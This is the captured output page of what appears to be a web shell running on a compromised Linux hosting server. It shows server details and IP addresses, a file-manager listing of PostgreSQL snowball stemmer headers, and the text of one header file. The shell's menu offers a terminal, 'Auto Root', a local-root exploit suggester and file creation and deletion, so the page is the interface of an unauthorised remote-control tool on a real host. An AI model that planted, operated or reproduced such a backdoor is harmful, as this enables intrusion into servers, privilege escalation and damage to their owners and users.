Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
pgsql /
server /
snowball /
libstemmer /
Delete
Unzip
Name
Size
Permission
Date
Action
api.h
763
B
-rw-r--r--
2021-06-15 13:00
header.h
2.43
KB
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_danish.h
325
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_dutch.h
322
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_english.h
328
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_finnish.h
328
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_french.h
325
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_german.h
325
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_hungarian.h
334
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_italian.h
328
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_norwegian.h
334
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_porter.h
325
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_portuguese.h
337
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_spanish.h
328
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_1_swedish.h
328
B
-rw-r--r--
2021-06-15 13:00
stem_ISO_8859_2_romanian.h
331
B
-rw-r--r--
2021-06-15 13:00
stem_KOI8_R_russian.h
316
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_danish.h
310
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_dutch.h
307
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_english.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_finnish.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_french.h
310
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_german.h
310
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_hungarian.h
319
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_italian.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_norwegian.h
319
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_porter.h
310
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_portuguese.h
322
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_romanian.h
316
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_russian.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_spanish.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_swedish.h
313
B
-rw-r--r--
2021-06-15 13:00
stem_UTF_8_turkish.h
313
B
-rw-r--r--
2021-06-15 13:00
Save
Rename
typedef unsigned char symbol; /* Or replace 'char' above with 'short' for 16 bit characters. More precisely, replace 'char' with whatever type guarantees the character width you need. Note however that sizeof(symbol) should divide HEAD, defined in header.h as 2*sizeof(int), without remainder, otherwise there is an alignment problem. In the unlikely event of a problem here, consult Martin Porter. */ struct SN_env { symbol * p; int c; int l; int lb; int bra; int ket; symbol * * S; int * I; unsigned char * B; }; extern struct SN_env * SN_create_env(int S_size, int I_size, int B_size); extern void SN_close_env(struct SN_env * z, int S_size); extern int SN_set_current(struct SN_env * z, int size, const symbol * s);